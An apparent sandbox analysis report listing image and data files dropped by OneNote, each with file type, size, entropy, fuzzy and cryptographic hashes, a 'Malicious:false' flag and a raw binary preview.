                                                                                                                                                                                                              Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 357x69, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5465
                                                                                                                                                                                                              Entropy (8bit):7.79401348966645
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:X0cZneDWlIKmXwxacOHHI6EhzNlSSDDgafbofgt7mGrw:XleDWlIJwQHihRdgu8imGk
                                                                                                                                                                                                              MD5:8470F9A96B6C6CAD9EE60961E96D19B2
                                                                                                                                                                                                              SHA1:AFE1F01FFA4E4CB06B1D770C9C59DA75B434D1AC
                                                                                                                                                                                                              SHA-256:2DF453410796AEC7B9EFEC00059B6CE64BCF67313A95AE458BA600EA5DE14811
                                                                                                                                                                                                              SHA-512:CAE5C2ED091BA49761F0348516D53491E578FB165F32F93AC7DAD927383E9A398B06229FAC6A8233777DF708E5001AE0037A1FA960293BDA49892C40B37F2240
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....C....................................................................C.......................................................................E.e.............................................8...............................!"1...2A#Qa.$34bBDSqt..........................................................?.....`0.....O...3Sd..@..5.0....Q.pw....;....!pN.DR....`0......N^...k.=.u.e.7{.b........?z....zV...M.....P:a.SPj.....WRK.=x.2.h..2..AS..s..A..|.Z/f$D.YX1pr......}G6._.~..)j...+.s.r".{..q..-.^@...#w|.H..*.K)....g...y..`0......2.w@.Ro.d....@...K....}...&... y..f.y.0.|DC..>p.[E.2......v..N.)Z..4.RF.D.8]..Z.|f/..+\ID.r/.o........0i..*.G.O..uj..RN. ....j...xnF...Q.Ls.U.c.D0m....z.k.P;f...b.=..L.hH.,./;.U..`sa.I...?*...I....M.0<.u....!..C..U.T.....s.Q......_..7K..*.....?....R\&=.<.u..oQ}WZ..Yu...{Fe3.h...@.s..mW.G..^....1.W.#[.q2.&u.c.G......`J./..X.C....M;.....3k$}.i.3...#/x.m.Oh.}FH]. ..5NNDIS.-.M~...6..w.d....P.;..k...........v*..T..L.P...s.!B.4..w
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14177
                                                                                                                                                                                                              Entropy (8bit):5.705782002886174
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
                                                                                                                                                                                                              MD5:7CDCE7EEBF795998DA6CAC11D363291C
                                                                                                                                                                                                              SHA1:183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
                                                                                                                                                                                                              SHA-256:DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
                                                                                                                                                                                                              SHA-512:560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E|....,iOyD|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4744
                                                                                                                                                                                                              Entropy (8bit):0.6501815664355782
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:Ra5jYyf9/UfYVa9FFBtAWrGbG7Wf/KxG/:YJYyfSKytBrkcdk
                                                                                                                                                                                                              MD5:CF22EFF43D0B0A22000BA86DC1BB9038
                                                                                                                                                                                                              SHA1:B847A09DA4D5351C046A2D2DC656BBD5292913F2
                                                                                                                                                                                                              SHA-256:5FD0F962CCC2605360F965CD518DAE4B9C823A4F66D871E564E248AA06689EF4
                                                                                                                                                                                                              SHA-512:1A92875C70D899F73B52A343AB3ADC4DDB053872CB2AD2567A1C44ABA5CD3E5D784E2B84C7456512B826C2474FD74B33106DE082C6733B4251BC14B4C5768431
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_.....Y'E......"................?.....I...............................................................................................................h..........................................._..d02KE.m....d{..........1S..M..E.................................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 76x97, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):784
                                                                                                                                                                                                              Entropy (8bit):6.962539208465222
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:869YM8fij0W/xfuCp7ovv1bidiMn3bGi6AETQcdH8SADjoZgV6v9jUEvS3/g:N9YMWeI424diMn3yinsQeHvADu9QEvJ
                                                                                                                                                                                                              MD5:14105A831FE32590E52C2E2E41879624
                                                                                                                                                                                                              SHA1:078FA63FC7DB5830E9059DF02D56882240429D90
                                                                                                                                                                                                              SHA-256:D0A3A1C3CD63C4023FE5716CBE2C211307D0E277E444D9EF76C7FC097A845FD4
                                                                                                                                                                                                              SHA-512:8FC0ED24E8EC14C46EA523D9265DE28F85C5FC57AA54AD5B9CA162E95F79221E2AD3DD67D1293CF756B67F3D3DECAE122254134EA8D4D00DDED02114B5383947
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......a.L..".......................................-........................!A."1.Qbq....2Ba.........................................................1............?.....3.Ty\......vs....>.>..a.W..s89.d...Z}......rz...`...Z.r.do....u.W.%....gf.>.L..xz....B8=w...g.~g."HD...$..IKJ......nn..*ly..I....L...\q...Q;6.KrxZ.,...j$..ZQ..)f...q`.*..C1..cZ2]-..\.~..J.....^..(.f..9m?..C.NI.UL..X.fy.Z.........+n....r."Z...d..R./\.#...kd.D.5.!...h.3*s-+.......Xjt..}i..rK..y.../>u..]N.....Y..J......1.x./.....F6.......I...._3...k.sM.+..v;.%|.f.~.......:y....S....UKovh...W'........lF... .................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4744
                                                                                                                                                                                                              Entropy (8bit):0.6414618582732867
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:RaIIhakYyf9/UfIQMDGFFBtnNINGWf/enN6:YHYyfSwrgtnNINGnnN6
                                                                                                                                                                                                              MD5:1577E2F0E8393FA87897464482947467
                                                                                                                                                                                                              SHA1:5FC2FDEE7FF8C9DDC86AE63655010875AC00A834
                                                                                                                                                                                                              SHA-256:9565A8D5698D704F23D885038020863BCD77D74BBE7F7D4114ABB48FD2A4C4B2
                                                                                                                                                                                                              SHA-512:B817869F40B9A90D1B15195CF9DF408CD6BF35D29C31213693BC44735CB546169655A5FAE6CC2797638DDAF126AFBE02FCD14D481E9B5DD37E90ACE4B5D44B4C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_j*._.3.N.B..U..m................?.....I...............................................................................................................h...........................................G.=.n.#M.y.....g.............^iB.....Em............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 171 x 552, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10056
                                                                                                                                                                                                              Entropy (8bit):7.956064700093514
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:edmu1fpj5DVHuooK4EpGLbAdT+dBXYBR8D1V2p6KwoPR6KUX9ojwRpgA:2Pp/B4LbAF+dBo/1E3S6JScpgA
                                                                                                                                                                                                              MD5:E1B57A8851177DD25DC05B50B904656A
                                                                                                                                                                                                              SHA1:96D2E31A325322F2720722973814D2CAED23D546
                                                                                                                                                                                                              SHA-256:2035407A0540E1C4F7934DB08BA4ADD750FCB9A62863DDD9553E7871C81A99E3
                                                                                                                                                                                                              SHA-512:BC7DC1201884E6DAFDC1F9D8E32656BFAEE0BB4905835E09B65299FE2D7C064B27EAA10B531F9BECF970C986E89A5FD8A0B83F508BBA34EB4E38B3F7F5FC623A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR.......(.....!..t....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................4.....bKGD....H....cmPPJCmp0712....H.s...#.IDATx^.w`......$..B....... ....fz5..6`l\.8...Nsz{.//y./....{.7}g.....e.....~.......s...f.....%c...6....O.PJ...Y.oi...9..'j.2..6.-
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 780x107, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2898
                                                                                                                                                                                                              Entropy (8bit):7.551512280854713
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:N9YMTXc4gpw+EIWnqQ5G+NE9VTzRFvS4+Xh+AKrNx+JuCluc3Eeky8etajhDCFex:/hDc4rPIoNEzbS4+XhOrGJu1cUHeoVey
                                                                                                                                                                                                              MD5:7C7D9922101488124D2E4666709198AC
                                                                                                                                                                                                              SHA1:00CC44A1B84D4D94A0ACE8834491EB5F65D04619
                                                                                                                                                                                                              SHA-256:20016E5FA1A32DCE5AF4E92872597E36432185A7BB2E61C91F362BD68484529B
                                                                                                                                                                                                              SHA-512:882944B2CF040485899128E03B7499C540D481E45FE8017DBF4FE0330157B2D8ABB7334DDB31C112BA0EFE3722A554883917C54155A7F60044D2D7F3D848260F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......k....".......................................2...........................c.....TUb...Sa...QRqr..............................!.....................Q...R..!..............?...$.)m.1...%%bV.J..H....-.%a[...I"WJ..:.X.:TT.$.......N.-NR.E..-NR.E...9..E....$.k.....B.I,I)..J...kr..+)..I,Yj..YbI..+,J..e..Z..V.e.$V..TV.X..V.YQZ.EQ..U%PY[.[.R.EP............................| F.. ...j*...!m.!j.I%.j.$...YeEYYEEUE..eY[.hEEUeEil.....%..el...V..TUYA.U.UTTUT.Z..UQQUQE...V.,...UlE.U[.lEP.P.@......................................R1...AR1m.....#..$:.T.p..IJ.t.....A..AH.,5..]F!a.XJFaa. ..a.!*.aa. X.e.......bB.b..,HX[,!..,,.c0.,..U..X..(,,...B(.,..4..B.`..".a..-......"...........................>D..IKEb...t.....)u.....)K.%+L\.J]i)*b.JR.IIL\i)u....T............T.....qs.it.iJ...])ZJb.....X....U.A...V1..B.R1....X...,.c...,%X...,%#0...,H
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4744
                                                                                                                                                                                                              Entropy (8bit):0.6433520002719106
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:RaKA8jYyfB3h1RRXUnfEaWRyO3kFFBl/FKBdRRujlw//0lweI/sgTRujd:RaKbjYyf9/UfEF3kFFBtdWf/s
                                                                                                                                                                                                              MD5:B3E150D2AE5BE5D839B48687D854389A
                                                                                                                                                                                                              SHA1:22516CC9A3FA010CBC83DEDD320F1CF3BF5D7D0F
                                                                                                                                                                                                              SHA-256:C084118EDD126FE982E112E22E89EC340ADD5CAD041B4608E65E2A25222D7464
                                                                                                                                                                                                              SHA-512:60EEB63D7C489C653D85BB5BC6B59B2BB401DA0C21BE5E538692D6C4B128CB0D786CE8F9B82AD2FEDCD2F7D3AE3A7DFCCFF47A3C3021100C0C309AA3ADE52426
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_}G....F..~W(|.4................?.....I...............................................................................................................h...........................................md?..-.L...)._;.........K...P.K.#/.q.R.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):39010
                                                                                                                                                                                                              Entropy (8bit):7.362726513389497
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
                                                                                                                                                                                                              MD5:9700DE02720CDB5A45EDE51F1A4647EC
                                                                                                                                                                                                              SHA1:CF72A73E1181719B1CC45C2FE0A6B619081E115E
                                                                                                                                                                                                              SHA-256:7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
                                                                                                                                                                                                              SHA-512:5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......|]v....D..9.k.w.|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 40 x 650, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):647
                                                                                                                                                                                                              Entropy (8bit):6.854433034679255
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:6v/71rwqZMXVs99W1YvpLp/Fvl+f43ocLtuplb+CrGotLRd:+wqWXVs99rpLpNvr3pIx3b
                                                                                                                                                                                                              MD5:DD876AA103BEC3AC83C769D768AD39FB
                                                                                                                                                                                                              SHA1:1833603AA9B6A7E53F9AD8A336F96CCE33088234
                                                                                                                                                                                                              SHA-256:1262DD23AD54E935CFA10FEB1BE56648E43BEF1116696CA71D87E6E033B1CA7D
                                                                                                                                                                                                              SHA-512:946DB2277213104A3B29EC4388578B05027B974A3093B4CCAD8847397AA51AE308BC6A199E5705E1F901D6E4B1BA34D8DECFD6E5B6685184A307D749D7CFAEDD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...(.........xk....`PLTE.........................................................................................>.S.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.)..1..7w....6.*.H`T6.ha.k.............b!....Ba..C..P.4K..@.....h.E..X....PX+.P.-.....@@"...o.O4....xZ<...B...B..,A..y.s<......b!....Ba..C..0_p. .......=..,...i. ...=.j..N...........{4+...xZ<...B....|.....$.K<.vyE..X....PX+.P.-.:... .'p......\,...i. ...=.j........K.....%J..S+.....q..k.H.@DD.s...:..J.K.DDL.\.@`,.DD.:.(]..N....KD....A M.....F..S+.....1.sq........\.t..;..../...~k...4.DD.:..]..N....KD........@DD.s...:..J.K..[...Q....V......IEND.B`.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4744
                                                                                                                                                                                                              Entropy (8bit):0.6499323616413185
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:RaQAQnFYyf9/Uf8kG4KFFBtQ5B5+Wf/y85S:YUYyfSjstBd
                                                                                                                                                                                                              MD5:B2C208482578B6CE1827A38165DBE544
                                                                                                                                                                                                              SHA1:195BA809E0D7F4F633B1F471C3D6F1388F8639CF
                                                                                                                                                                                                              SHA-256:DA18D81F95048C33666A86DDF246972E08DD70E78B442C443B7DAD2A5979501C
                                                                                                                                                                                                              SHA-512:994ECAC2EA69117272CEBF41D251FE85BCD3C47AB45EE0FC78473D253BEB4918AD97B3C1EAE8D57B3FF5723DE722C98BD75AB48BC1EEBD29D8246B9D5DE359E9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_r...8W.F.e}.#...................?.....I...............................................................................................................h...........................................|.kLa.B.6..............].-...N.].7.m..............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):32656
                                                                                                                                                                                                              Entropy (8bit):3.9517299510231485
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                                                                                                                              MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                                                                                                                              SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                                                                                                                              SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                                                                                                                              SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):68633
                                                                                                                                                                                                              Entropy (8bit):7.709776384921022
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
                                                                                                                                                                                                              MD5:41241EE59AB7BC9EB34784E3BCE31CB4
                                                                                                                                                                                                              SHA1:98680761A51E9199CF3C89F68B5309FBEC7EE3CB
                                                                                                                                                                                                              SHA-256:035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
                                                                                                                                                                                                              SHA-512:3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4744
                                                                                                                                                                                                              Entropy (8bit):0.6518944030753487
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:RazmYyf9/UfVgs4FFBtkTAEcTs2Wf/qgTsq:YzmYyfSdgs2tkkEctkl
                                                                                                                                                                                                              MD5:9BFFED70BF1FED1EB4740172CFCBEEF5
                                                                                                                                                                                                              SHA1:0D9565483653A7C4FB5BE01D258DE2425CC6F2CE
                                                                                                                                                                                                              SHA-256:CE0841D29276DB10EAC6E4C37282AA1DD8BC22B8E6E5E3F49EB7A6DED341B0E2
                                                                                                                                                                                                              SHA-512:C5E61DCC893C9CBEA0EC650670A72F29D33198D5A2211E1191A93E3748206DFF24D9746E4A7BBAB2D2EBF78F06C66FA5FB30AF4A4109693D0B31CD8932343824
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_.<..zQM../Ed...................?.....I...............................................................................................................h.............................................a9.6D..ji._.E...............J.'...V.,............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1354
                                                                                                                                                                                                              Entropy (8bit):7.799120546917745
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:AXFMpSCdmi2MTbWm/8T368Bf50D+1vDD9BFGBsQ5SOryjJ4w6++mPKc82UGOpIUg:AO4m122bQ36gfaS1rDw2QsOryjJ4xLml
                                                                                                                                                                                                              MD5:C2BF462C1311A92660999498F29394BD
                                                                                                                                                                                                              SHA1:4BD7C156F172C1114F33D80BAB05252C9F8E87C0
                                                                                                                                                                                                              SHA-256:5E0A8F7D863DAD057AC91FB888CFA7BE1D30A6CF65A908CE90081C323A0858B7
                                                                                                                                                                                                              SHA-512:1107117B3C4B843E5EB32CB13C5CA91E28857DDAE18A197F471D9FCA5B767C7441661FC3A21D2B6FF3C6EB91048A93598E1D86EA55A60A427D8E4B82E59A30C9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...(...(........m....sRGB.........pHYs...t...t..f.x....IDATXG..O.W....`...c.C..`.H(!@.[Q..B.D......Q..}.C...}.CTU.MR.j...[.....".x.B.x.wG.2$xf.J..W..g....}w.H.....b* ...../.V_|.....TC]-.d......\\Z..l......>..D....G.....}.]}.x...X...WZ....?.-..A..&x...Q$)U..../.w...?..!8IE..:.....6..y.z..Yg.`g.@(...z...VS..$@..q2.,."....RT.}..%..q.lA0....[m.................2...8..a.LJ....n......M.%x......\...$g.Y.p.Q^U....$;.r.....>...>...]..$...r..bz.P*.(....}:&'ldc...c|.bs.>z.:?.M....(.SR..a..o..*=2....i#..{......y.)....}.1_ .....T@O..F..d....Piu.TQA....#DY.S&G....j....3z..>zL..:...33...C&.S....h...LQk. ...hRSy&m..?...d.....l.].G...BL.-..N;.....s.0Q....T.(0...p....HU..d.V..z.)..2. ..........d...x.{......2.zdP.....;.?aeu......(..,#.....nj.... ....0.X..dr.T)x...4.V...]p8].p.PH.4f{.n.....x.........Z...O>DF.)^.Y.....p.Zf..1e.a.>."fm{.=hui...Fnn.T......./''...U<.,f'........:Y......ckk..RN.....f.omf..rZi.\..h.....|.4.,/......=.z%.F....*Z...>.*.A.....?.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):24268
                                                                                                                                                                                                              Entropy (8bit):6.946124661664625
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
                                                                                                                                                                                                              MD5:3CD906D179F59DDFA112510C7E996351
                                                                                                                                                                                                              SHA1:48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
                                                                                                                                                                                                              SHA-256:1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
                                                                                                                                                                                                              SHA-512:2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
                                                                                                                                                                                                              Malicious:false
